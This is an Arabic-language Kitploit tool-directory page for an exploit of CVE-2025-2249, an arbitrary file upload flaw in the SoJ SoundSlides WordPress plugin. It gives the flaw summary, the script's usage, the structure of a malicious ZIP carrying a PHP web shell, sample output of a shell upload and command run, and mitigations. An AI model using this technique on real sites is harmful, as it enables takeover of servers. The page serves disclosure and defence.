Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-2249 — المكوّن الإضافي SoJ SoundSlides لووردبريس <= 1.2.2 عرضة لثغرة رفع ملفات تعسفي | Kitploit
أدوات/GitHubGitHub/nxploited/cve-2025-2249
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubnxploited/cve-2025-2249

CVE-2025-2249

المكوّن الإضافي SoJ SoundSlides لووردبريس <= 1.2.2 عرضة لثغرة رفع ملفات تعسفي

عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🔐 المكوّن الإضافي SoJ SoundSlides لووردبريس <= 1.2.2 - رفع ملفات تعسفي للمستخدمين الموثقين

⚠️ إخلاء مسؤولية: هذا الاستغلال مخصص للأغراض التعليمية والاختبار المصرح به فقط.


📌 ملخص الثغرة

  • المكوّن الإضافي: SoJ SoundSlides  
  • الإصدارات المتأثرة: <= 1.2.2  
  • النوع: رفع ملفات تعسفي للمستخدمين الموثقين (مساهم أو أعلى)  
  • حالة التصحيح: ❌ لا يوجد إصلاح رسمي متاح

يسمح المكوّن الإضافي SoJ SoundSlides للمستخدمين الموثقين بدور مساهم أو أعلى برفع ملفات ZIP عشوائية. وبسبب غياب التحقق من الصحة، يمكن للمهاجمين رفع قذائف ويب PHP يتم استخراجها وتنفيذها من دليل يمكن الوصول إليه عبر الويب.


💥 الأثر

يمكن للمهاجم الذي يمتلك بيانات اعتماد ووردبريس صالحة أن:

  • 📦 يرفع أرشيف ZIP يحتوي على قشرة PHP
  • 🖥️ ينفّذ أوامر النظام عن بُعد (?cmd=)
  • 🔓 يحصل على تحكم غير مصرح به في الموقع/الخادم

🛠️ الاستخدام

root@kitploit:~
usage: CVE-2025-2249.py [-h] -u URL -un USERNAME -p PASSWORD

Exploit for CVE-2025-2249 | WordPress SoJ SoundSlides Plugin # By Nxploited | Khaled ALenazi,

options:
  -h, --help            show this help message and exit
  -u, --url URL         WordPress base URL
  -un, --username USERNAME
                        WordPress username
  -p, --password PASSWORD
                        WordPress password
الوسيطالوصف
-uرابط ووردبريس الأساسي
-unاسم مستخدم ووردبريس
-pكلمة مرور ووردبريس

✨ الميزات

  • 🔍 التحقق من الإصدار من readme.txt للمكوّن
  • 🧰 إنشاء ملف ZIP تلقائيًا بالبنية المطلوبة وقشرة الويب
  • 📤 استغلال نقطة الرفع المعرضة للثغرة
  • 💻 تنفيذ أوامر تفاعلي عبر القشرة المرفوعة

📂 بنية ملف ZIP

root@kitploit:~
nxploit/
├── index.html
├── data/
│   └── data.xml
├── audio/
│   └── audio.mp3
└── nxploit.php  ← PHP shell (?cmd=)

🧪 مثال

root@kitploit:~
[*] Checking plugin version...
[+] Vulnerable version detected.
[*] Logging in...
[+] Login successful.
[*] Uploading shell...
[*] Shell uploaded: http://target/wp-content/uploads/SoundSlides/nxploit_shell/nxploit.php
> whoami
www-data

🛡️ التخفيف

  • ❌ تعطيل المكوّن أو إزالته
  • 🧱 تطبيق قيود على الرفع
  • 🔍 مراقبة wp-content/uploads/ بحثًا عن ملفات .php غير متوقعة

صُنع بـ ❤️ بواسطة [Nxploited | Khaled ALenazi]
لأغراض التعليم والتوعية والدفاع.


🧠 ملاحظة ختامية

الأمن مسؤولية الجميع. اختبر دائمًا بشكل أخلاقي، وأبلغ عن الثغرات بمسؤولية، واحمِ الويب.

تنزيل الأداة